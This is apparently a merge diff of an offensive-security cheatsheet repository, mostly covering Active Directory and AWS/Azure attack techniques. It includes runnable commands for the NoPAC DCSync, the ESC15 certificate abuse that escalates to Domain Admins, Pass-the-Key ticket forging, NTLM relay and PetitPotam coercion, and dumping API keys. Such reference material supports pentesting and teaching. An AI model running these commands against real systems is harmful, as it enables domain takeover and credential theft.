Merge 9a83ac7fb5 into d603ecc3b8

docs/active-directory/CVE/NoPAC.md

@@ -32,7 +32,7 @@
     ```
 1. Clear the controlled machine account `servicePrincipalName` attribute
     ```ps1
-    impacket@linux> addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController
+    krbrelayx@linux> addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController
 
     powershell@windows> . .\Powerview.ps1
     powershell@windows> Set-DomainObject "CN=ControlledComputer,CN=Computers,DC=domain,DC=local" -Clear 'serviceprincipalname' -Verbose
@@ -63,7 +63,10 @@
 
     cmd@windows> Rubeus.exe s4u /self /impersonateuser:"DomainAdmin" /altservice:"ldap/DomainController.domain.local" /dc:"DomainController.domain.local" /ptt /ticket:[Base64 TGT]
     ```
-6. DCSync: `KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'`
+6. DCSync
+    ```ps1
+    KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'
+    ```
 
 Automated exploitation:
 

docs/active-directory/ad-adcs-certificate-services.md

@@ -423,6 +423,50 @@ Members           : {}
   ```
 
 
+## ESC15 - EKUwu Application Policies
+
+**Requirements**
+
+* **Template Schema Version 1**
+* **ENROLLEE_SUPPLIES_SUBJECT** = True
+
+**Exploitation**:
+
+Detect the vulnerability from BloodHound data using the following cypher query.
+
+```ps1
+MATCH p=(:Base)-[:MemberOf*0..]->()-[:Enroll|AllExtendedRights]->(ct:CertTemplate)-[:PublishedTo]->(:EnterpriseCA)-[:TrustedForNTAuth]->(:NTAuthStore)-[:NTAuthStoreFor]->(:Domain) WHERE ct.enrolleesuppliessubject = True AND ct.authenticationenabled = False AND ct.requiresmanagerapproval = False AND ct.schemaversion = 1 RETURN p
+```
+
+The **Application Policies** extension is a proprietary certificate extension with the OID `1.3.6.1.4.1.311`, same as **x509 EKUs**. It was designed to allow users to specify additional use cases for certificates by utilizing the same OIDs as those in the Enhanced Key Usage extension.
+If there is a conflict between an Application Policy and an EKU, then Microsoft prefers the proprietary Application Policy.
+
+> "Application policy is Microsoft specific and is treated much like Extended Key Usage. If a certificate has an extension containing an application policy and also has an EKU extension, the EKU extension is ignored." - Microsoft
+
+
+When a user requests a certificate based on a schema version 1 template and includes an application policy, the policy is incorporated into the certificate. This allows users to specify arbitrary EKUs, bypassing the requirements for ESC2.
+
+**ESC1** - The WebServer template is enabled by default in ADCS, requires a user-supplied SAN and only has the `Server Authentication` EKU. Using [ly4k/Certipy PR #228](https://github.com/ly4k/Certipy/pull/228), we can add the `Client Authentication` EKU to `WebServer`. Anybody with the `Enroll` permission on this template can now compromise the domain.
+
+```ps1
+certipy req -dc-ip 10.10.10.10 -ca CA -target-ip 10.10.10.11 -u user@domain.com -p 'P@ssw0rd' -template WebServer -upn Administrator@domain.com --application-policies 'Client Authentication'
+certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10 -ldap-shell
+
+# in LDAP shell
+add_user pentest_user
+add_user_to_group pentest_user "Domain Admins"
+```
+
+
+**ESC2/ESC3** - **Certificate Request Agent** (`1.3.6.1.4.1.311.20.2.1`),
+
+```ps1
+certipy -req -u user@domain.com -p 'P@ssw0rd' --application-policies "1.3.6.1.4.1.311.20.2.1" -ca "Lab Root CA" -template WebServer -dc-ip 10.10.10.10 -target-ip 10.10.10.11
+certipy -req -u user@domain.com -p 'P@ssw0rd' -on-behalf-of DOMAIN\\Administrator -Template User -ca "Lab Root CA" -pfx user.pfx -dc-ip 10.10.10.10 -target-ip 10.10.10.11
+certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
+```
+
+
 ## Certifried CVE-2022-26923
 
 > An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege.
@@ -543,3 +587,6 @@ Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User vi
 * [ADCS Attack Paths in BloodHound — Part 2 - Jonas Bülow Knudsen - May 1, 2024](https://posts.specterops.io/adcs-attack-paths-in-bloodhound-part-2-ac7f925d1547)
 * [ESC12 – Shell access to ADCS CA with YubiHSM - hajo - October 2023](https://pkiblog.knobloch.info/esc12-shell-access-to-adcs-ca-with-yubihsm)
 * [AD CS Domain Escalation - HackTricks](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#shell-access-to-adcs-ca-with-yubihsm-esc12)
+* [ESC15/EKUwu PR #228 - dru1d-foofus - 10/08/2024](https://github.com/ly4k/Certipy/pull/228)
+* [EKUwu: Not just another AD CS ESC - Justin Bollinger - October 08, 2024](https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc)
+* [ADCS Exploitation Part 2: Certificate Mapping + ESC15 - Giulio Pierantoni - Oct 10, 2024](https://medium.com/@offsecdeer/adcs-exploitation-series-part-2-certificate-mapping-esc15-6e19a6037760)

docs/active-directory/ad-adds-enumerate.md

@@ -2,11 +2,12 @@
 
 ## Using BloodHound
 
-Use the correct collector:
+Use the appropriate data collector to gather information for **BloodHound** or **BloodHound Community Edition (CE)** across various platforms.
 
 * [BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound) for Azure Active Directory
 * [BloodHoundAD/SharpHound](https://github.com/BloodHoundAD/SharpHound) for local Active Directory (C# collector)
 * [FalconForceTeam/SOAPHound](https://github.com/FalconForceTeam/SOAPHound) for local Active Directory (C# collector using ADWS)
+* [g0h4n/RustHound-CE](https://github.com/g0h4n/RustHound-CE) for local Active Directory (Rust collector)
 * [NH-RED-TEAM/RustHound](https://github.com/NH-RED-TEAM/RustHound) for local Active Directory (Rust collector)
 * [fox-it/BloodHound.py](https://github.com/fox-it/BloodHound.py) for local Active Directory (Python collector)
 * [coffeegist/bofhound](https://github.com/coffeegist/bofhound) for local Active Directory  (Generate BloodHound compatible JSON from logs written by ldapsearch BOF, pyldapsearch and Brute Ratel's LDAP Sentinel)

docs/active-directory/hash-over-pass-the-hash.md

@@ -1,6 +1,6 @@
 # Hash - OverPass-the-Hash
 
-In this technique, instead of passing the hash directly, we use the NT hash of an account to request a valid Kerberost ticket (TGT).
+> In this technique, instead of passing the hash directly, we use the NT hash of an account to request a valid Kerberost ticket (TGT).
 
 
 ### Using impacket
@@ -10,9 +10,6 @@ root@kali:~$ python ./getTGT.py -hashes ":1a59bd44fe5bec39c44c8cd3524dee" lab.ro
 root@kali:~$ export KRB5CCNAME="/root/impacket-examples/velociraptor.ccache"
 root@kali:~$ python3 psexec.py "jurassic.park/velociraptor@labwws02.jurassic.park" -k -no-pass
 
-# also with the AES Key if you have it
-root@kali:~$ ./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com
-
 root@kali:~$ ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5
 root@kali:~$ kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM
 root@kali:~$ klist
@@ -26,9 +23,6 @@ root@kali:~$ klist
 # NOTE: Make sure to clear tickets in the current session (with 'klist purge') to ensure you don't have multiple active TGTs
 .\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /ptt
 
-# More stealthy variant, but requires the AES256 hash
-.\Rubeus.exe asktgt /user:Administrator /aes256:[AES256HASH] /opsec /ptt
-
 # Pass the ticket to a sacrificial hidden process, allowing you to e.g. steal the token from this process (requires elevation)
 .\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe
 ```

docs/active-directory/hash-pass-the-key.md

@@ -0,0 +1,57 @@
+# Hash - Pass The Key
+
+Pass The Key allows attackers to gain access to systems by using a valid session key instead of the user's password or NTLM hash. This technique is related to other credential-based attacks like Pass The Hash (PTH) and Pass The Ticket (PTT) but specifically uses session keys to authenticate.
+
+Pre-authentication requires the requesting user to provide a secret key, which is derived from their password and may use encryption algorithms such as DES, RC4, AES128, or AES256.
+
+* **RC4**: ARCFOUR-HMAC-MD5 (23), in this format, this is the NTLM hash, go to **Pass The Hash** to use it directly and **Over Pass The Hash** page to request a TGT from it.
+* **DES**: DES3-CBC-SHA1 (16), should not be used anymore and have been deprecated since 2018 ([RFC 8429](https://www.rfc-editor.org/rfc/rfc8429)).
+* **AES128**: AES128-CTS-HMAC-SHA1-96 (17), both AES encryption algorithms can be used with Impacket and Rubeus tools.
+* **AES256**: AES256-CTS-HMAC-SHA1-96 (18)
+
+In the past, there were more encryptions methods, that have now been deprecated.
+
+| enctype                    | weak?| krb5   | Windows |
+| -------------------------- | ---- | ------ | ------- |		
+| des-cbc-crc                | weak	| <1.18	 | >=2000  | 
+| des-cbc-md4                | weak	| <1.18	 | ?       | 
+| des-cbc-md5                | weak	| <1.18	 | >=2000  | 
+| des3-cbc-sha1              | 	 	| >=1.1	 | none    | 
+| arcfour-hmac               | 	 	| >=1.3	 | >=2000  | 
+| arcfour-hmac-exp           | weak	| >=1.3	 | >=2000  | 
+| aes128-cts-hmac-sha1-96    | 	 	| >=1.3	 | >=Vista | 
+| aes256-cts-hmac-sha1-96	 |      | >=1.3	 | >=Vista | 
+| aes128-cts-hmac-sha256-128 | 	 	| >=1.15 | none    | 
+| aes256-cts-hmac-sha384-192 | 	 	| >=1.15 | none    | 
+| camellia128-cts-cmac	 	 |      | >=1.9	 | none    | 
+| camellia256-cts-cmac	 	 |      | >=1.9	 | none    | 
+
+Microsoft Windows releases Windows 7 and later disable single-DES enctypes by default.
+
+
+Either use the AES key to generate a ticket with `ticketer`, or request a new TGT using `getTGT.py` script from Impacket.
+
+## Generate a new ticket
+
+* [fortra/impacket/ticketer.py](https://github.com/fortra/impacket/blob/master/examples/ticketer.py)
+    ```powershell
+    impacket-ticketer -aesKey 2ef70e1ff0d18df08df04f272df3f9f93b707e89bdefb95039cddbadb7c6c574 -domain lab.local Administrator -domain-sid S-1-5-21-2218639424-46377867-3078535060
+    ```
+
+## Request a TGT
+
+* [fortra/impacket/getTGT.py](https://github.com/fortra/impacket/blob/master/examples/getTGT.py)
+    ```powershell
+    impacket-getTGT -aesKey 2ef70e1ff0d18df08df04f272df3f9f93b707e89bdefb95039cddbadb7c6c574 lab.local
+    ```
+
+* [GhostPack/Rubeus](https://github.com/GhostPack/Rubeus)
+    ```powershell
+    .\Rubeus.exe asktgt /user:Administrator /aes128 bc09f84dcb4eabccb981a9f265035a72 /ptt
+    .\Rubeus.exe asktgt /user:Administrator /aes256:2ef70e1ff0d18df08df04f272df3f9f93b707e89bdefb95039cddbadb7c6c574 /opsec /ptt
+    ```
+
+
+## References
+
+* [MIT Kerberos Documentation - Encryption types](https://web.mit.edu/kerberos/krb5-1.18/doc/admin/enctypes.html)

docs/active-directory/internal-mitm-relay.md

@@ -245,18 +245,55 @@ secretsdump.py -k -no-pass target.lab.local
 
 *  WebClient service
 
+
+**Enable WebClient**:
+
+WebClient service can be enable on the machine using several techniques:
+
+* Mapping a WebDav server using `net` command : `net use ...`
+* Typing anything into the explorer address bar that isn't a local file or directory
+* Browsing to a directory or share that has a file with a `.searchConnector-ms` extension located inside.
+    ```xml
+    <?xml version="1.0" encoding="UTF-8"?>
+    <searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
+        <description>Microsoft Outlook</description>
+        <isSearchOnlyItem>false</isSearchOnlyItem>
+        <includeInStartMenuScope>true</includeInStartMenuScope>
+        <templateInfo>
+            <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
+        </templateInfo>
+        <simpleLocation>
+            <url>https://example/</url>
+        </simpleLocation>
+    </searchConnectorDescription>
+    ```
+
 **Exploitation**:
 
-* Disable HTTP in Responder: `sudo vi /usr/share/responder/Responder.conf`
+* Discover machines on the network with enabled WebClient service
-* Generate a Windows machine name: `sudo responder -I eth0`, e.g: WIN-UBNW4FI3AP0
-* Prepare for RBCD against the DC: `python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support`
-* Discover WebDAV services
     ```ps1
     webclientservicescanner 'domain.local'/'user':'password'@'machine'
-    netexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav
+    netexec smb 10.10.10.10 -d 'domain' -u 'user' -p 'password' -M webdav
     GetWebDAVStatus.exe 'machine'
     ```
-* Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.0.0.4`, the listener host must be specified with the FQDN or full netbios name like `logger.domain.local@80/test.txt`. Specifying the IP results in anonymous auth instead of System. 
+
+* Disable HTTP in Responder
+    ```ps1
+    sudo vi /usr/share/responder/Responder.conf
+    ```
+
+* Generate a Windows machine name, e.g: "WIN-UBNW4FI3AP0"
+    ```ps1
+    sudo responder -I eth0
+    ```
+
+* Prepare for RBCD against the DC
+    ```ps1
+    python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support
+    ```
+
+
+* Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.10.10.10`, the listener host must be specified with the FQDN or full netbios name like `logger.domain.local@80/test.txt`. Specifying the IP results in anonymous auth instead of System. 
   ```ps1
   # PrinterBug
   dementor.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP"
@@ -267,6 +304,7 @@ secretsdump.py -k -no-pass target.lab.local
   Petitpotam.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP"
   PetitPotam.exe "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP"
   ```
+
 * Use the created account to ask for a service ticket: 
     ```ps1
     .\Rubeus.exe hash /domain:purple.lab /user:WVLFLLKZ$ /password:'iUAL)l<i$;UzD7W'
@@ -275,6 +313,13 @@ secretsdump.py -k -no-pass target.lab.local
     # IP of PC1: 10.0.0.4
     ```
 
+An alternative for the previous exploitation method is to register a **DNS entry** for the attack machine by yourself then trigger the coercion.
+
+```ps1
+python3 /opt/krbrelayx/dnstool.py -u lab.lan\\jdoe -p 'P@ssw0rd' -r attacker.lab.lan -a add -d 192.168.1.50 192.168.1.2
+python3 /opt/PetitPotam.py -u jdoe -p 'P@ssw0rd' -d lab.lan attacker@80/test 192.168.1.3
+```
+
 
 ## Man-in-the-middle RDP connections with pyrdp-mitm
 

docs/cheatsheets/escape-breakout.md

@@ -59,6 +59,7 @@
         ```
     * Save it as 24-bit Bitmap (*.bmp;*.dib)
     * Change its extension from bmp to bat and run 
+    * Download: >>> ![](./escape-breakout-mspaint.bmp) <<<
     
 
 ## Sticky Keys

docs/cloud/aws/aws-cli.md

@@ -0,0 +1,74 @@
+# AWS - CLI
+
+The AWS Command Line Interface (CLI) is a unified tool to manage AWS services from the command line. Using the AWS CLI, you can control multiple AWS services, automate tasks, and manage configurations through profiles.
+
+
+## Set up AWS CLI
+
+Install AWS CLI and configure it for the first time:
+
+```ps1
+aws configure
+```
+
+This will prompt for:
+
+* AWS Access Key ID
+* AWS Secret Access Key
+* Default region name
+* Default output format
+
+
+## Creating Profiles
+
+You can configure multiple profiles in `~/.aws/credentials` and `~/.aws/config`.
+
+* `~/.aws/credentials` (stores credentials)
+
+    ```ini
+    [default]
+    aws_access_key_id = <default-access-key>
+    aws_secret_access_key = <default-secret-key>
+
+    [dev-profile]
+    aws_access_key_id = <dev-access-key>
+    aws_secret_access_key = <dev-secret-key>
+
+    [prod-profile]
+    aws_access_key_id = <prod-access-key>
+    aws_secret_access_key = <prod-secret-key>
+    ``` 
+
+* `~/.aws/config` (stores region and output settings)
+
+    ```ini
+    [default]
+    region = us-east-1
+    output = json
+
+    [profile dev-profile]
+    region = us-west-2
+    output = yaml
+
+    [profile prod-profile]
+    region = eu-west-1
+    output = json
+    ``` 
+
+You can also create profiles via the command line:
+
+```ps1
+aws configure --profile dev-profile
+```
+
+
+
+## Using Profiles
+
+When running AWS CLI commands, you can specify which profile to use by adding the `--profile` flag:
+
+```ps1
+aws s3 ls --profile dev-profile
+```
+
+If no profile is specified, the **default** profile is used.

docs/cloud/aws/aws-ec2.md

@@ -3,6 +3,18 @@
 * [dufflebag](https://labs.bishopfox.com/dufflebag) - Find secrets that are accidentally exposed via Amazon EBS's "public" mode
 
 
+## Listing Information About EC2
+
+```ps1
+aws ec2 describe-instances
+aws ec2 describe-instances --region region
+aws ec2 describe-instances --instance-ids ID
+```
+
+
+
+
+
 ## Copy EC2 using AMI Image
 
 First you need to extract data about the current instances and their AMI/security groups/subnet : `aws ec2 describe-images --region eu-west-1`

docs/cloud/aws/aws-iam.md

@@ -1,6 +1,19 @@
 # AWS - Identity & Access Management
 
-## AWS - Shadow Admin 
+## Listing IAM access Keys
+
+```ps1
+aws iam list-access-keys
+```
+
+### Listing IAM Users and Groups
+
+```ps1
+aws iam list-users
+aws iam list-groups
+```
+
+## Shadow Admin 
 
 ### Admin equivalent permission 
 
@@ -104,7 +117,6 @@
     ```
 
 
-
 ## References
 
 * [Cloud Shadow Admin Threat 10 Permissions Protect - CyberArk](https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/)

docs/cloud/aws/aws-lambda.md

@@ -1,7 +1,21 @@
-# AWS - Service - Lambda
+# AWS - Service - Lambda & API Gateway
 
 
-## Extract function's code
+## List Lambda Functions
+
+```ps1
+aws lambda list-functions
+```
+
+
+### Invoke a Lambda Function
+
+```
+aws lambda invoke --function-name name response.json --region region 
+```
+
+
+## Extract Function's Code
 
 ```powershell
 aws lambda list-functions --profile uploadcreds
@@ -10,6 +24,37 @@ wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
 ```
 
 
+## List API Gateway
+
+```ps1
+aws apigateway get-rest-apis
+aws apigateway get-rest-api --rest-api-id ID
+```
+
+
+## Listing Information About Endpoints
+
+```ps1
+aws apigateway get-resources --rest-api-id ID
+aws apigateway get-resource --rest-api-id ID --resource-id ID
+aws apigateway get-method --rest-api-id ApiID --resource-id ID --http-method method
+```
+
+
+## Listing API Keys
+
+```ps1
+aws apigateway get-api-keys --include-values
+```
+
+
+## Getting Information About A Specific Api Key
+
+```ps1
+aws apigateway get-api-key --api-key KEY
+```
+
+
 ## References
 
 * [Getting shell and data access in AWS by chaining vulnerabilities - Appsecco - Riyaz Walikar - Aug 29, 2019](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed)

docs/cloud/aws/aws-metadata.md

@@ -5,7 +5,7 @@
 :warning: Only working with IMDSv1.
 Enabling IMDSv2 : `aws ec2 modify-instance-metadata-options --instance-id <INSTANCE-ID> --profile <AWS_PROFILE> --http-endpoint enabled --http-token required`.
 
-In order to use IMDSv2 you must provide a token.
+In order to use **IMDSv2** you must provide a token.
 
 ```powershell
 export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"`

docs/cloud/aws/aws-s3-bucket.md

@@ -58,12 +58,13 @@ export AWS_SESSION_TOKEN=FQoGZXIvYXdzE[...]8aOK4QU=
 ```
 
 
-## Open S3 Bucket
+## Public S3 Bucket
 
 An open S3 bucket refers to an Amazon Simple Storage Service (Amazon S3) bucket that has been configured to allow public access, either intentionally or by mistake. This means that anyone on the internet could potentially access, read, or even modify the data stored in the bucket, depending on the permissions set.
 
 * [http://s3.amazonaws.com/<bucket-name>/](http://s3.amazonaws.com/<bucket-name>/)
 * [http://<bucket-name>.s3.amazonaws.com/](http://<bucket-name>.s3.amazonaws.com/)
+* [https://<bucket-name>.region.amazonaws.com/<file>>](https://<bucket-name>.region.amazonaws.com/<file>)
 
 AWS S3 buckets name examples: [http://flaws.cloud.s3.amazonaws.com](http://flaws.cloud.s3.amazonaws.com). 
 
@@ -107,21 +108,21 @@ aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2
 
 ### Copy, Upload and Download Files
 
-* Copy
+* **Copy**
 	```bash
 	aws s3 cp <source> <target> [--options]
 	aws s3 cp local.txt s3://bucket-name/remote.txt --acl authenticated-read
 	aws s3 cp login.html s3://bucket-name --grants read=uri=http://acs.amazonaws.com/groups/global/AllUsers
 	```
 
-* Upload
+* **Upload**
 	```bash
 	aws s3 mv <source> <target> [--options]
 	aws s3 mv test.txt s3://hackerone.files
 	SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"
 	```
 
-* Download
+* **Download**
 	```bash
 	aws s3 sync <source> <target> [--options]
 	aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2

docs/cloud/azure/azure-enumeration.md

@@ -3,7 +3,7 @@
 ## Azure AD - Collectors
 
 * [**Microsoft Portals**](https://msportals.io/) - Microsoft Administrator Sites
-* [**ROADTool**](https://github.com/dirkjanm/ROADtools) - A collection of Azure AD tools for offensive and defensive security purposes 
+* [**dirkjanm/ROADTool**](https://github.com/dirkjanm/ROADtools) - A collection of Azure AD tools for offensive and defensive security purposes 
     ```ps1
     roadrecon auth --access-token eyJ0eXA...
     roadrecon auth --prt-cookie <primary-refresh-token> -r msgraph -c "1950a258-227b-4e31-a9cf-717495945fc2"
@@ -52,6 +52,12 @@
     Get-Help Invoke-Monkey365 -Examples
     Get-Help Invoke-Monkey365 -Detailed
     ```
+* [**prowler-cloud/prowler**](https://github.com/prowler-cloud/prowler) - Prowler is an Open Source Security tool for AWS, Azure, GCP and Kubernetes to do security assessments, audits, incident response, compliance, continuous monitoring, hardening and forensics readiness. Includes CIS, NIST 800, NIST CSF, CISA, FedRAMP, PCI-DSS, GDPR, HIPAA, FFIEC, SOC2, GXP, Well-Architected Security, ENS and more
+* [**projectdiscovery/nuclei-templates**](https://github.com/projectdiscovery/nuclei-templates/tree/main/cloud/azure) - Community curated list of templates for the nuclei engine to find security vulnerabilities.
+    ```ps1
+    nuclei -t ~/nuclei-templates/cloud/azure/ -code -v
+    ```
+* [**nccgroup/ScoutSuite**](https://github.com/nccgroup/ScoutSuite) - Multi-Cloud Security Auditing Tool
 * [**Flangvik/TeamFiltration**](https://github.com/Flangvik/TeamFiltration) - TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts
     ```ps1
     TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --cookie-dump C:\\CookieData.txt --all
@@ -66,10 +72,9 @@
     ```
 * [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - :warning: This repository has not been updated recently - Azure Red Team tool for graphing Azure and Azure Active Directory objects
 * [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) - :warning: This repository has been archived - Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
-* [**FSecureLABS/Azurite Explorer**](https://github.com/FSecureLABS/Azurite) - :warning: This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
+* [**FSecureLABS/Azurite**](https://github.com/FSecureLABS/Azurite) - :warning: This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
 * [**cyberark/SkyArk**](https://github.com/cyberark/SkyArk) - :warning: This repository has not been updated recently - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins.   
 
-
 ## Azure AD - User Enumeration
 
 ### Enumerate Tenant Informations
@@ -223,3 +228,4 @@ Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020 -Reco
 * [CARTP-cheatsheet - Azure AD cheatsheet for the CARTP course](https://github.com/0xJs/CARTP-cheatsheet/blob/main/Authenticated-enumeration.md)
 * [Attacking Azure/Azure AD and introducing Powerzure - SpecterOps - Ryan Hausknecht - Jan 28, 2020](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a)
 * [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)
+* [Azure Config Review - Nuclei Templates v10.0.0 - Prince Chaddha - Sep 12, 2024](https://blog.projectdiscovery.io/azure-config-review-with-nuclei/)